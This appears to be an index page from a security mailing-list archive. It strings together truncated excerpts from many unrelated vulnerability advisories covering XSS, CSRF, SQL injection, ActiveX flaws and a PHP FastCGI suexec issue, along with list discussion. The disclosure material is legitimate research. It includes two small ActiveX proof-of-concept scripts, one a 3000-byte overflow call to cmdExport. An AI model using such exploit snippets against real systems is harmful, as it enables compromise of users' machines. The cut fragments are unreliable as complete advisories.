<< Previous Next >>
script
Reference: http://www.htbridge.ch/advisory/multiple_xss_vulnerabilities_in_phpdug.html
Product: PHPDug
Vendor: Kubelabs.com ( http://www.kubelabs.com/ )
Vulnerable Version: 2.0.0 and probably prior versions
Vendor Notification: 21 April 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
Product: miniblog
Vendor: spyka Web Group ( http://www.spyka.net )
Vulnerable Version: 1.0.0 and probably prior
Tested on: 1.0.0
Vendor Notification: 25 May 2011
Vulnerability Type: XSS (Cross Site Scripting) , CSRF (Cross-Site Request Forgery)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting & cross-site request forgery attacks.
<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdExport arg1
</script>
</body>
</html>
429
Introduction:
=============
Scriptable, distributed and object oriented Hosting Platform. Manage
Clients, Resellers,
Domains, Backups, Stats, Mails and Databases. Manage everything!
(Copy of the Vendor Homepage: http://www.lxcenter.org/)
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Autodesk Maya Script Nodes Arbitrary Command Execution
1. *Advisory Information*
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
===========================================================================
Title: TwonkyMedia Server Multiple Cross-Site Scripting Vulnerabilities
Product: TwonkyMedia Server
Vendor: TwonkyMedia (PacketVideo Corporation), http://www.twonkymedia.com
Author: Davide Canali
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020
I. INTRODUCTION
Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.
More information is available on the official product web site at the
1.1 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_document.php
Vulnerable parameter - id_document
Example
*******
Summary
=======
Cisco Unified Contact Center Express (Cisco Unified CCX) server contains
both a directory traversal vulnerability and a script injection
vulnerability in the administration pages of the Customer Response
Solutions (CRS) and Cisco Unified IP Interactive Voice Response (Cisco
Unified IP IVR) products. Exploitation of these vulnerabilities could
result in a denial of service condition, information disclosure, or a
privilege escalation attack.
Date: 15. June 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-74.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TorrentTrader is a feature packed and highly customisable PHP/MySQL Based
BitTorrent tracker. Featuring integrated forums and plenty of administration
options. Please visit www.torrenttrader.org for the support forums.
Most current installations of PHP set up to run via FastCGI with suexec are vulnerable to a local exploit, where anyone with the ability to run code as the user the webserver runs as can gain access as any user with an account set up to run PHP. It is anticipated that this issue will especially affect shared web hosts who use FastCGI + suexec thinking it will give them additional security.
Conditions for exploitation:
=> PHP needs to be used via CGI or FastCGI.
=> The system must be set up to use suexec (rather than, say, having PHP run as an external FastCGI server).
=> The attacker must be able to run code as the same user that the webserver runs as. This is unlikely to be a problem for many local attackers, because there are a multitude of possible attack vectors, such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also installed), and likely numerous other options.
=> Depending on the configuration, setting an open_basedir might protect an installation. However, this only applies if open_basedir is set, php-cgi is not installed directly into the web space, but is instead called from a script which doesn't pass any parameters from the script command line.
Affected PHP versions:
=> All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at the date of this advisory are believed to be affected.
Version Tested: pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane <justin@madirish.net>
Description
pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files. pPIM came to my attention recently with the
[http://www.terena.org/activities/tf-csirt/iodef/docs/i-taxonomy_terms.html]
In this case a security policy has been designated with the
"max_execution_time" directive and that policy is being violated by
the blocking code. As you say there are ways around this, (kill
script, resource limiting, etc..) however there can be similar
mitigating circumstances in any situation where you have a
vulnerability (firewall, executable stack protection, etc..).
As with any vulnerability it is the vendor's responsibility to provide
a fix and protect it's users. Many web developers or administrators
[HSC] GWExtranet Script Injections & Privilege Escalation Vulnerability
Attackers may exploit this issue via a web client. An attacker may leverage this
issue to have arbitrary script code execute in the browser of an unsuspecting user
in the context of the affected site. This may help the attacker steal cookie-based
authentication credentials and launch other attacks. A successful exploit could
allow an attacker to compromise the application by defacing by evil code injection.
No offence intended but if you take a little more effort of validating your
work before posting publicly then you can save yourself from embarrassment.
I don't see anything in the script that can bypass zone security and run
successfully from internet zone. I am sure you have tested it locally and
drawn conclusion that the script can execute from internet zone. To test the
script from internet zone, you need to upload it to a webserver and try
accessing via browser.
Any VB/Java script will run from local security with a charm but if you can
###############################################################################
1. Unauthorized password reset in "manager/passwordreset.php"
###############################################################################
Reason: directly accessible php script
Attack vectors: user submitted POST parameters "ID" and "Password"
Preconditions: none
Impact: attacker can take over CruxCMS admin account
Php script "manager/passwordreset.php" is directly accessible via web
(to get the scripts mentioned by this advisory please get the full
version at http://www.hexale.org/advisories/OCHOA-2010-0209.txt; I did
not include them here to reduce the size of this email)
Windows SMB NTLM Authentication Weak Nonce Vulnerability
Security Advisory
Hernan Ochoa (hernan@gmail.com) - Agustin Azubel (agustin.azubel@gmail.com)
PasswordManager Pro 6.1 Script Injection Vulnerability
scip AG Vulnerability ID 4063 (12/15/2009)
http://www.scip.ch/?vuldb.4063
I. INTRODUCTION
"Password Manager Pro is a secure vault for storing and managing shared
sensitive information such as passwords, documents and digital
identities of enterprises."
Date of Public Advisory: 16.11.2009
Solution: YES (Non official)
Author: Sintsov Alexey from Digital Security Research Group [DSecRG]
Description
***********
Browser-Based Interface (BBI) software is included in the Nortel Networks(vesrions < 25.0.0.0) and Radware
family of switches. The BBI software lets you use your Web browser to access switch
information and statistics, to perform switch configuration via the Internet. This
======================================================================
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
#######################################################################
#
# CVE ID : CVE-2009-4505
# Product: OpenCMS OAMP Comments Module
# Vendor: Open Source, Alkacon GmbH (Cologne, Germany)
# Subject: Cross-site scripting (XSS)
# Risk: High
# Effect: Anonymously exploitable
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date: March 24th 2010
#
CLSID: {189504B8-50D1-4AA8-B4D6-95C8F58A6414}
Progid: Sb.SuperBuddy.1
Binary Path: C:\Programmi\AOL 9.1\sb.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<script language='vbscript'>
Set obj = CreateObject("Sb.SuperBuddy.1")
</script>
<script language='javascript'>
Thanks. I'm glad that my blocking DoS and DoS via resources consumption
exploit give you inspiration to find new way to attack Firefox and IE7 ;-).
> Internet Explorer 7 version: 7.0.5730.13 will by the way consume up to 70%
> of the CPU if the same script is run.
MaXe, it's resource consumption DoS, which described in my mentioned-above
Classification of DoS vulnerabilities in browsers. So 70% or higher (up to
100%) CPU resources is used, it's already resource consumption DoS.
Survey: "MIME/Content-Type-Sniffing" Issues in Image Uploads in Forum Scripts
Author: Jacques Copeau
Abstract
====================================================
Internet Explorer, especially versions 7 and 6, can be tricked to treat images
as html, opening XSS vulnerabilities in software that allows uploads.
IN a survey, we found myBB, fluxBB, phorum, SMF and WBB to be vulnerable to
such attacks.
- Novell Netstorage Multiple Vulnerabilities
- Description
"Novell NetStorage acts as a bridge between a company's protected Novell network
and the Internet, providing protected file access from any Internet
location. Files
and folders on a Novell NetWare® 6.5 server or Novell Open Enterprise
Server can be
accessed using either a browser or via Network Neighborhood and Microsoft Web
ECHO_ADV_89$2008
-----------------------------------------------------------------------------------------
[ECHO_ADV_89$2008] Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability
-----------------------------------------------------------------------------------------
Author : M.Hasran Addahroni
Date : April, 28 th 2007
Location : Jakarta, Indonesia
Web : http://advisories.echo.or.id/adv/adv89-K-159-2008.txt
Date of Public Advisory: 03.03.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Flyspray system has multiple security vulnerabilities:
1. SiXSS in POST
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
*Vulnerability Description*
Android is project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/panel.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of
sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
MODx system has multiple security vulnerabilities:
1. Linked XSS
<<Previous Next>>
|
